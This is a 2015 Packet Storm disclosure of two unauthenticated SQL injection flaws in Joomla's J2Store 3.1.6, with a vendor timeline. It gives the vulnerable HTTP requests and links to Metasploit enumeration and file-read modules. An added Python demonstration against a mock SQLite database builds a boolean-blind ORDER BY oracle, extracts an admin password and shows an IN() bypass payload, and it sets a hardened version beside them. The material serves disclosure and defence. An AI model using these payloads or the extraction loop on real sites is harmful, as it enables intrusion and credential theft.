Joomla J2Store 3.1.6 SQL Injection

2015-07-11T00:00:00
ID PACKETSTORM:132658
Type packetstorm
Reporter Brandon Perry
Modified 2015-07-11T00:00:00

Description

J2Store v3.1.6, a Joomla! extension that adds basic store functionality to  
a Joomla! instance, suffered from two unauthenticated SQL injection  
vulnerabilities, each exploitable both boolean-blind and error-based. As of  
this writing, J2Store has had about 16,000 downloads since February 2015.  
  
  
The first vulnerability was in the sortby parameter of the product search  
request (option=com_j2store, view=products, task=browse), shown below.  
  
POST /index.php HTTP/1.1  
Host: 192.168.1.3  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 124  
  
search=&sortby=product_name+DESC&option=com_j2store&view=products&task=browse&Itemid=115  
  
  
  
The second vulnerability was in the advanced search request, a multipart  
form POST, within the manufacturer_ids[] parameter.  
  
POST /index.php HTTP/1.1  
Host: 192.168.1.3  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------69182815810793866481457026727  
Content-Length: 1023  
  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="pricefrom"  
  
0  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="priceto"  
  
521  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="manufacturer_ids[]"  
  
1  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="option"  
  
com_j2store  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="view"  
  
products  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="task"  
  
browse  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="Itemid"  
  
115  
-----------------------------69182815810793866481457026727  
Content-Disposition: form-data; name="9d0a4b9d6d4b46fc51d25844b91c2057"  
  
1  
-----------------------------69182815810793866481457026727--  
  
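The following is an added, illustrative model of both injection points above; it is not J2Store's code and not the ExploitHub modules. It uses an in-memory SQLite database with a constructed products/users schema, splices the sortby value and the manufacturer_ids[] value into the query text the way a vulnerable search would, drives a boolean-blind oracle through the sort column, shows a manufacturer id that escapes the IN() list, and places a hardened search (allow-listed sort column, integer-cast ids, bound parameters) beside it. The assumption that sortby reaches an ORDER BY clause and manufacturer_ids[] an IN() list is inferred from the request shapes, not stated by the advisory; all table names, columns and rows are made up.

```python
import sqlite3
import string

# Constructed stand-in schema and rows; not J2Store's tables.
_SCHEMA = """
CREATE TABLE products (id INTEGER, product_name TEXT, price REAL, manufacturer_id INTEGER);
INSERT INTO products VALUES (1, 'Anvil', 50.0, 1), (2, 'Bellows', 20.0, 1), (3, 'Crucible', 80.0, 2);
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'hunter2');
"""


def _db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(_SCHEMA)
    return conn


def search_vulnerable(sortby, manufacturer_ids, pricefrom=0, priceto=1000):
    """Bug class under discussion: request values are spliced into the SQL text.

    sortby is assumed to land in ORDER BY and manufacturer_ids[] in an IN() list
    (an assumption drawn from the request shapes, not from J2Store's source).
    """
    ids = ",".join(manufacturer_ids)
    sql = (f"SELECT product_name FROM products "
           f"WHERE price BETWEEN {pricefrom} AND {priceto} "
           f"AND manufacturer_id IN ({ids}) ORDER BY {sortby}")
    return [row[0] for row in _db().execute(sql)]


# Hardened variant: sort column from an allow-list, ids cast to int, values bound.
ALLOWED_SORT = {"product_name": "product_name", "price": "price"}


def search_hardened(sortby, manufacturer_ids, pricefrom=0, priceto=1000):
    col, _, direction = sortby.partition(" ")
    direction = direction.upper() or "ASC"
    if col not in ALLOWED_SORT or direction not in ("ASC", "DESC"):
        raise ValueError("unsupported sort order")
    ids = [int(i) for i in manufacturer_ids]  # raises on anything that is not an integer
    placeholders = ",".join("?" * len(ids))
    sql = (f"SELECT product_name FROM products WHERE price BETWEEN ? AND ? "
           f"AND manufacturer_id IN ({placeholders}) "
           f"ORDER BY {ALLOWED_SORT[col]} {direction}")
    return [row[0] for row in _db().execute(sql, [pricefrom, priceto, *ids])]


def hardened_rejects(sortby, manufacturer_ids):
    """True if the hardened search refuses the input instead of running it."""
    try:
        search_hardened(sortby, manufacturer_ids)
    except ValueError:
        return True
    return False


def order_by_oracle(condition):
    """Boolean-blind probe through the sort column.

    When `condition` is true the rows sort by product_name, otherwise by price,
    so comparing against the untampered ordering answers one yes/no question.
    """
    payload = f"(CASE WHEN ({condition}) THEN product_name ELSE price END) DESC"
    baseline = search_vulnerable("product_name DESC", ["1", "2"])
    return search_vulnerable(payload, ["1", "2"]) == baseline


def extract_admin_password(max_len=32, alphabet=string.ascii_lowercase + string.digits):
    """Recover users.password for 'admin' one character at a time via the oracle."""
    secret = "(SELECT password FROM users WHERE username='admin')"
    length = next((n for n in range(1, max_len + 1)
                   if order_by_oracle(f"length({secret}) = {n}")), None)
    if length is None:
        return None
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if order_by_oracle(f"substr({secret}, {pos}, 1) = '{ch}'"):
                recovered += ch
                break
    return recovered


def in_clause_bypass():
    """A manufacturer_ids[] value that closes the IN() list and appends OR (1=1)."""
    return search_vulnerable("product_name ASC", ["1) OR (1=1"])


if __name__ == "__main__":
    print("oracle true/false:", order_by_oracle("1=1"), order_by_oracle("1=2"))
    print("recovered:", extract_admin_password())
    print("IN() bypass rows:", in_clause_bypass())
    print("hardened rejects payloads:",
          hardened_rejects("(CASE WHEN (1=1) THEN product_name ELSE price END) DESC", ["1"]),
          hardened_rejects("product_name DESC", ["1) OR (1=1"]))
```

The oracle needs no error message and no data in the response body beyond the row order, which is why an ORDER BY sink is exploitable even when the application swallows database errors; the hardened function closes both sinks by never letting request text reach the SQL string.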
  
A Metasploit scanner module and two auxiliary modules are available on the  
ExploitHub store which will help you find and validate any vulnerable  
instances. A PCAP is included with each module.  
  
Free Metasploit scanner module:  
https://exploithub.com/j2store-3-1-6-sql-injection-scanner.html  
  
Metasploit User/Password Enumeration auxiliary module:  
https://exploithub.com/j2store-3-1-6-user-password-enumeration-via-sql-injection.html  
  
Metasploit Arbitrary File Read auxiliary module:  
https://exploithub.com/j2store-3-1-6-arbitrary-file-read-via-sql-injection.html  
  
  
Timeline  
July 7 2015: Reported to vendor  
July 7 2015: Vendor response asking for details  
July 7 2015: Details sent  
July 7 2015: Vendor sends email saying the vulnerabilities were fixed and a  
new version will be out soon  
July 8 2015: Version 3.1.7 released, advisory released with modules  
  
--   
http://volatile-minds.blogspot.com -- blog  
http://www.volatileminds.net -- website  
  
  